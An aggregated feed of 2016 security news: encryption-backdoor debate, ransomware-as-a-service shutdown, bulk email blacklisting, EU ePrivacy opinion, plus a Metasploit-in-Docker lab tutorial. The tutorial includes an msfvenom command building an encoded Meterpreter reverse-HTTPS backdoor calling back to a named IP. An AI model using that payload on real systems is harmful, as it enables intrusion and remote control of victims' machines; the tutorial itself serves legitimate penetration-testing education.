without

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Cryptsetup Vulnerability Grants Root Shell Access on Some Linux Systems

November 15, 2016 , 3:28 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

Apple may have refused to help the FBI unlock an iPhone used by the San Bernardino shooter, but the tech industry is still better off working with the U.S. government on encryption issues than turning away, according to a former official with the Obama administration.

“The government can get very creative,” said Daniel Rosenthal, who served as the counterterrorism director in the White House until January this year. He fears that the U.S. government will choose to “go it alone” and take extreme approaches to circumventing encryption, especially if another terrorist attack occurs.

[ Safeguard your data! The tools you need to encrypt your communications and web data. • Maximum-security essential tools for everyday encryption. • InfoWorld's encryption Deep Dive how-to report. | Discover how to secure your systems with InfoWorld's Security Report newsletter. ]

“The solutions they come up with are going to be less privacy protective,” he said during a talk at the Versus 16 cybersecurity conference. “People will think they are horrifying, and I don’t want us to see us get to that place.”

Rosenthal made his comments as President-elect Donald Trump—who previously called for a boycott of Apple during its dispute with the FBI—prepares to take office in January.

A Trump administration has a “greater likelihood” than the Obama administration of supporting legislation that will force tech companies to break into their customers’ encrypted data when ordered by a judge, Rosenthal said.

“You have a commander-in-chief, who said at least on the campaign trail he’s more favorable towards a backdoor regime,” Rosenthal said.

Earlier this year, one such bill was proposed that met with staunch opposition from privacy advocates. However, in the aftermath of another terrorist attack, Congress might choose to push aside those concerns and pass legislation drafted without the advice of Silicon Valley, he said.  

Rosenthal went on to say that U.S. law enforcement needs surveillance tools to learn about terrorist plots, and that’s where the tech industry can help. During his time in the White House, he noticed a “dramatic increase” in bad actors using encryption to thwart government efforts to spy on them.

“There are people trying to come up with a reasonable solution,” he said of efforts to find a middle ground on the encryption debate. “To immediately say there is no solution is counter historical.”

dsc05324Michael Kan

Cindy Cohn (right), executive director of EFF, and Daniel Rosenthal, former director of counterterrorism for the White House.

However, Rosenthal’s comments were met with resistance from Cindy Cohn, executive director for Electronic Frontier Foundation, a privacy advocate. She also spoke at the talk and opposed government efforts to weaken encryption, saying it “dumbs down” security.

“This idea of a middle ground that you can come up with an encryption strategy that only lets good guy into your data, and never lets a bad guy into your data, misunderstands how the math works,” she said.

Law enforcement already possess a wide variety of surveillance tools to track terrorists, she said. In addition, tech companies continue to help U.S. authorities on criminal cases and national security issues, despite past disputes over privacy and encryption.

But law enforcement has done little to recognize the risks of building backdoors into products, Cohn said. Not only would this weaken security for users, but also damage U.S. business interests.

“If American companies can’t offer strong encryption, foreign companies are going to walk right into that market opportunity,” she said.

Cohn also said any effort to force U.S. companies to weaken encryption wouldn’t necessarily help catch terrorists. That’s because other strong encryption products from foreign vendors are also circulating across the world.

“The idea that the Americans can make sure that ISIS never gets access to strong encryption is a pipe dream,” she said. “That’s why I think this is bad idea. Because I don’t think it’s going to work.”

The Versus 16 conference was sponsored by cybersecurity firm Vera. 

To comment on this article and other InfoWorld content, visit InfoWorld's LinkedIn page, Facebook page and Twitter stream.


InfoWorld Security

Security researchers earlier this year managed to zero-in on the Encryptor Ransomware-as-a-Service (Raas), which forced the developer to shut down the operation, but without releasing the master key to help victims.

The ransomware service first emerged in July 2015 as a multiplatform threat at an appealing price, and managed to become a considerable threat to users and businesses fast, Trend Micro researchers reveal. Attacks leveraging this piece of ransomware could be easily tailored by affiliates, and Encryptor RaaS author created a full web panel for his patrons, which could be accessed only via the Tor network.

The same as with other ransomware, Bitcoin was the preferred transaction currency, and the earnings looked highly appealing for affiliates, as they had to share only 5% of their revenue to the author. Other similar services out there, such as Cerber, would require affiliates to pay 40% in commissions, Trend Micro explains (the Cerber campaigns generate an estimated $ 2.3 million in annual revenue). 

Encryptor RaaS was being advertised in surface web and darknet forums and interested parties only needed to contact the developer to show interest. Technical expertise wasn’t a requirement, though affiliates needed to know how to set up a Bitcoin Wallet ID, which would be attached to the distributed ransomware variant. Affiliates were also provided with a “customer ID” and could choose the ransom amount and the distribution method.

The malware was written purely in C language, used a combination of RC6 and RSA-2048 algorithms to encrypt 231 file types, generated an ID for each victim, and had its entire infrastructure hidden within the Tor network. Victims were instructed to use Tor2Web or the Tor Browser to access the payment site and could also use a chat box to contact the cybercriminals.

The ransomware’s author focused on avoiding detection and even started offering a file-signing service for affiliates, saying that he had access to stolen Authenticodes. Encryptor RaaS was improved to become virtually undetectable, being able to trick static engine analysis, but still being caught by behavioral detection.

While analyzing the threat, researchers discovered that the actor left a command and control (C&C) server either abandoned or mistakenly open: it was exposed and not anonymized by Tor. Thus, researchers determined that Encryptor RaaS was being hosted on a legitimate cloud service, and one of the RaaS’s systems was seized in June.

The operator immediately took the infrastructure down as a precautionary measure, but more servers were seized a few days later. However, the developer managed to bring the entire system back online after four days, and also announced that it would shut down the operation. A shutdown notice was posted on all the main pages of decryptor sites, and Encryptor RaaS’s main site.

“Encryptor RaaS’s systems went down around 5 PM GMT on July 5, 2016, with the developer leaving victims a message that they can no longer recover their files, as he deleted the master key,” Trend Micro reveals. Thus, while there’s one less ransomware family to worry about, there are users left without the possibility of recovering their files.

Related: Locky Ransomware Drops Offline Mode

Related: New MarsJoke Ransomware Targets Government Agencies

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:


SecurityWeek RSS Feed

blog_email_send_blacklist_SQ

Email is one of the most efficient ways to keep in touch with your existing or perspective customers. But only if you use it properly.

Has this ever happened to you: your phone rings, and it’s one of your executives screaming because a mail he or she sent to a customer bounced back with a Non-Delivery Report, the dreaded NDR? Just as you hang up your phone rings again about another NDR, and your cell phone beeps a text message from your monitoring system notifying that your outbound mail queue is starting to back up, and before you know it you’ve got a full-fledged disaster on your hands because no email is getting out. You do some digging and find out pretty quickly – you’ve been blacklisted. So what happened?

Well if this was the mid 90’s, I’d say you had yourself on open relay on your hands, and got added to one or more of the blacklists that track those things. But you know better than that, and so that leaves your marketing department. Maybe they set up a script using blat to crank out thousands of emails to a mailing list they found/created. Or perhaps they purchased an application and are running it on their desktop to do similar things. Or they could have simply started cranking out bulk volumes of email with Word and Outlook because you don’t have restrictions on send rates.

Whatever the reason, the road to heck is paved with good intentions, and when someone tries to do IT without IT’s involvement, bad things can happen. You get the mess cleaned up, finally figure out how to get yourself delisted, and speak harshly to the marketing team about never doing it again. That’s when they look at you and say “But we have to send out these emails. How do we do it?”

Commercial remailer services are the way to go here. There are several on the market that offer remailing services to send out newsletters, advertising, notifications, or pretty much any other bulk emailing need you may have, and there are multiple advantages to using these.

Bulk emailing uses a lot of bandwidth, especially when attachments are included. It can use even more with replies, NDRs, unsubscribe requests, and more. If a third-party service is sending email for you, then they are using their bandwidth and can deal with all the responses, provided that you are using a subdomain instead of your primary domain. In other words, if you are @example.com, ensure that mail is send by [email protected] and either delegate that domain to them for management, or ensure your MX for that domain resolves to their systems, not yours.

You will still find some recipients that will blacklist the sending system. When that is a subdomain instead of your primary domain, and the IP’s blocked are the third party mailer’s and not yours, you can avoid all the legitimate mail being sent by your users being blocked.

Anyone sending bulk email needs to have an unsubscribe method and honor requests for removal. That can be a lot of work, so third party mailing services have this down to a science, with automatic processing. That’s much easier than doing it by hand, can be done instantly, and will go a long way to keeping your customers’ good will towards you.

What do you need to do in order to start using a third party service? There is a great blog post over at Zapier.com titled Transactional Email: The 7 Best Services to Send 1000s of Emails Daily that lists, well, the seven best services to send bulk email.

Check out that list for links to the top services, and keep in mind there are others out there too that you may want to investigate. Keep the costs in mind and speak to your colleagues from marketing, but also keep your eye out on the following features:

  • Will they send from a subdomain?
  • Will they manage DNS for that subdomain, or let you, as you prefer?
  • Do they support DKIM and DMARC?
  • Do they handle replies as well?

You want to minimize the likelihood that your business email system is going to suffer any backlash from sending outbound mails in volume through a service, and you also want to ensure that the mails, while bulk, do adhere to best practices for bulk email, and that you map them into your SPF or other DNS records so that they are not flagged for spoofing.

So if you have a need for sending bulk email, check out one of the services listed in the post linked above, and ensure you set things up on your end as well. That way, marketing can do what they need, you don’t get angry phone calls, and your company email keeps flowing.

You may also like:

  • What the Future Brings for Emails in SMBs
  • Hacked by a purchase order. How it can happen.
  • Time to start thinking of the Exchange 2007 EOL


GFI Blog

Microsoft researchers have devised a way for third parties to make use the vast amount of encrypted data stored in the cloud by companies and individuals, without them actually having access to it or learning anything about it (except for what can be deduced from the result).

use encrypted data

The solution involves a protocol for a Secure Data Exchange (SDE) that uses Secure Multi-Party Computation (MPC), and which removes the need of the third party decrypting (and, therefore, being able to peek into) the data before it is used in computations.

The owner of the data gives the keys to it to the buyer (or keys to part of it to the potential buyer) and the buyer uses them to decrypt the data inside a multiparty computation.

“All of the computation is performed in the cloud, and the computation itself is encrypted in such a way that not even the cloud knows what is being computed, which protects any of the buyer’s data used in the computation such as a proprietary algorithm. If everything goes as expected, the cloud reveals the decrypted results to the interested parties,” Microsoft’s John Roach explains.

In the paper describing the solution, the researchers offered several real-world business scenarios where a secure data exchange using their protocol can come in handy.

For example: A company that’s developing machine learning models that will assist primary care providers in choosing the best treatment plans for their patients needs data to develop and study their models. They want to buy anonymized patient medical records from hospitals to do that, but only if the data does not already fit the model.

“This could in theory be tested by running simple statistical tests comparing the model parameters with the data, but in practice not because the hospital is not willing to disclose its data before a deal has been made,” the researchers explained.

A secure data exchange of this kind can also provide a way for the buyer to try out a fragment of this data, so that he can make an informed decision about whether it will be worth to buy the entirety of the data.

The researchers’ solution is still in the concept phase but, according to Roach, they are planning to create – and publicly release – the tools that will allow the creation of secure data exchanges in the not-so-distant future.


Help Net Security

Metasploit Framework is a powerful open source tool for penetration testing. Whether you’re looking to use it for work or are merely interested in experimenting with it, you can run Metasploit Framework in a Docker container without having to deal with the pain of installing the code and its dependencies. The Docker image “remnux/metasploit” is available as part of the REMnux collection, thanks to the configuration efforts of Jean Christophe Baptiste.

The following instructions and examples demonstrate how you can start using this Metasploit Docker container in a lab as well as on a publicly-accessible server. The container provides the command-line Metasploit Framework version of the tool. It lacks the web-based interface that you can get if you install the free Community edition, which you would need to register with Rapid 7. Command-line capabilities of Metasploit Framework are very powerful and lend themselves well to penetration testing tasks that involve running the tool on a remote system.

How to Launch the Metasploit Framework Docker Container

To make use of the Metasploit Framework Docker image, all you need is a sufficiently-powerful system that is connected to the Internet and that has Docker installed on it. When you run a command like the one below on such a host, it will automatically download the image from the REMnux repository and launch it:

 sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit 

In this example, I directed Docker to run the application “remnux/metasploit” in a transient container, which will disappear once you’ve exited it (that’s what “–rm” is for). The “-it” parameter allows you to interact with the container using an interactive shell.

To ensure that relevant data persists across container invocations, I used the “-v” parameter to map the directories on my host to the corresponding locations inside the container. The idea is to use the “~/.msf4” directory for Metasploit Framework configuration files. The “/tmp/msf” directory on the host can store other data you may wish to keep, such as the artifacts you might obtain from the targeted systems.

The “-p” parameter maps the ports on which you expect to receive inbound connections to the corresponding ports inside the container. The example above uses TCP port 443 with the expectation of incoming HTTPS connections from reverse shells.

The image is quite large: over 1.2GB in size, because it includes the full runtime environment for Metasploit Framework, along with all its dependencies. It will be cached locally after the initial download. If you ever wish to refresh the image to ensure you’re using the latest version use the command “sudo docker pull remnux/metasploit”.

The container is configured to automatically update Metasploit modules whenever you launch it. To add your own modules, add them to your host’s ~/.msf4 directory.

Test-Driving the Metasploit Framework Container

Here’s how you might start experimenting with Metasploit Framework after launching its “remnux/metasploit” container in your lab. I’ll target a weakly-configured Windows system in my lab for example purposes. I’ll direct Metasploit Framework to remotely connect to the system using the credentials that I supplied, rather than actually exploiting a vulnerability. I will then open a reverse HTTPS shell to my Metasploit Framework console.

In the sample session above, I launched Metasploit’s msfconsole tool, then directed it to give me an interactive Meterpreter shell to the targeted system. The connection was tunneled over HTTPS, which was directed to the Metasploit Framework container over TCP port 443.

The screenshot that I saved using this session was placed in the /tmp/data directory inside the container. When I exited the container, the contents of that directory persisted on my underlying host in the /tmp/msf directory.

Running the Metasploit Framework Container in the Public Cloud

When performing penetration testing, you’ll probably want to run Metasploit on an Internet-accessible system. You can do this quite easily by bringing up a temporary server within some public cloud provider, then running the Metasploit Framework container on that host.

For instance, here is how you can accomplish this using DigitalOcean, which I like to use due to its low cost and high reliability. (The link includes my referral code.) Though DigitalOcean can spin up virtual machines for merely $ 5 per month, I found such a low-end system to have insufficient RAM for Metasploit. Therefore, I went with the $ 10 per month option for an Ubuntu host.

Once the new system is active, you can log into it and execute the following commands to install Docker on the host:

 apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D add-apt-repository -y "deb https://apt.dockerproject.org/repo ubuntu-$ (lsb_release -sc) main" apt-get update apt-get -y dist-upgrade apt-get -y install docker-engine 

Afterwards, you can direct Docker to download and launch the Metasploit Framework container using the command like the one in the beginning of this article.

 sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit 

For this example, I decided to use Metasploit to generate a standalone backdoor executable file, which I would run on the targeted Windows system to simulate a scenario where the victim is tricked into running malware. I ran the “msfvenom” tool inside the Metasploit Framework container to accomplish this:

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=104.236.213.164 LPORT=443 -e x86/shikata_ga_nai -f exe -o file.exe 

Since the current directory inside the container is /tmp/data by default, the resulting file was placed there. Because I mapped this directory to the host’s /tmp/msf directory, I was able to take it from there and transfer it to my lab’s Windows computer.

I then ran “msfconsole” inside the container and directed the tool to use multi/handler, which is designed to accept connections generated outside of the “msfconsole” interface. Once the reverse-HTTPS listener was active, I “infected” my Windows system with the previously-created file.exe, which completed the connection and provided me with a Meterpreter shell.

As was the case in the previous example, I saved the screenshot of the Windows system into /tmp/data, which allowed me to retain it even after the container terminated.

Additional Capabilities of the Container

The Metasploit Framework container also includes the infamous Nmap scanning tool, which you can run using the “nmap” command. It offers a powerful way to examine networks and systems to locate potentially-vulnerable services and to determine where to focus your Metasploit efforts. The container also includes the NASM disassembler.

In addition the container includes the tmux terminal multiplexer utility. It allows you to launch multiple “virtual” windows inside a single terminal window. The container’s configuration for this tool maps Ctrl+a as the command key, instead of the default Ctrl+b. To make use of it, type “tmux” after launching the Metasploit Framework container. This will give you a shell inside one of the tool’s “virtual” window. To open another one, press Ctrl+a followed by “c”. To switch between the windows, type Ctrl+a followed by that window’s number (e.g., Ctrl+a followed by “0” or “1”).

For example, you could use tmux to run nmap in one window and msfconsole in another. You can read a tutorial on using tmux to get started with this tool.

Wrapping It Up

Docker containers offer a convenient way of running Metasploit Framework without having to deal with the installation of the tool’s code and its dependencies. Running Metasploit this way is especially handy for situations where you wish to quickly deploy it to a new system, such as one running in a public cloud, and then tear it down without losing your customizations or data. On the other hand, this approach requires some familiarity with Docker containers.

Thanks to Jean Christophe Baptiste for creating and maintaining the Dockerfile and associated configuration files upon which the “remnux/metasploit” image is based. If you notice any problems with this container or have suggestions for improving it, please log an issue on the REMnux repository for Docker files.

Updated


Lenny Zeltser

“The confidentiality of online communications by individuals and businesses is essential for the functioning of modern societies and economies. The EU rules designed to protect privacy in electronic communications need to reflect the world that exists today,” European Data Protection Supervisor (EDPS) Giovanni Buttarelli opined after reviewing a new proposal on the ePrivacy Directive.

European privacy advisor wants encryption without backdoors

The existing ePrivacy Directive is currently under revision. The European Commission is collecting feedback on the proposal, and should prepare a new, updated version of the legislation by the end of 2016. One of the purposes of the EDPS is to advise EU institutions on policies and legislation that affect privacy.

In his opinion, the EDPS says that the scope of new ePrivacy rules needs to be broad enough to cover all forms of electronic communications irrespective of network or service used, not only those offered by traditional telephone companies and internet service providers. Individuals must be afforded the same level of protection for all types of communication such as telephone, Voice over IP services, mobile phone messaging app, Internet of Things (machine to machine).

The updated rules should also ensure that the confidentiality of users is protected on all publicly accessible networks, including Wi-Fi services in hotels, coffee shops, shops, airports and networks offered by hospitals to patients, universities to students, and hotspots created by public administrations.

Any interference with the right to confidentiality of communications is contrary to the European Charter of Fundamental Rights.

No communications should be subject to unlawful tracking and monitoring without freely given consent, whether by cookies, device-fingerprinting, or other technological means. Users must also have user-friendly and effective mechanisms to give, or not give, their consent. In order to better protect the confidentiality and security of electronic communications, the current consent requirement for traffic and location data must be strengthened.

The existing rules in the ePrivacy Directive protecting against unsolicited communications, such as advertising or promotional messages, should be updated and strengthened and require prior consent of the recipients for all forms of unsolicited electronic communications.

The new rules should also clearly allow users to use end-to-end encryption (without “backdoors”) to protect their electronic communications. Decryption, reverse engineering or monitoring of communications protected by encryption should be prohibited.

A new provision for organisations to periodically disclose aggregate numbers indicating EU and non-EU law enforcement or government requests for information would offer some welcome transparency in the sensitive, complex and often contentious area of government access to communications.

The new rules should complement, and where necessary, specify the protections available under the General Data Protection Regulation (GDPR). They should also maintain the existing, higher level of protection in those instances where the ePrivacy Directive offers more specific safeguards than in the GDPR.


Help Net Security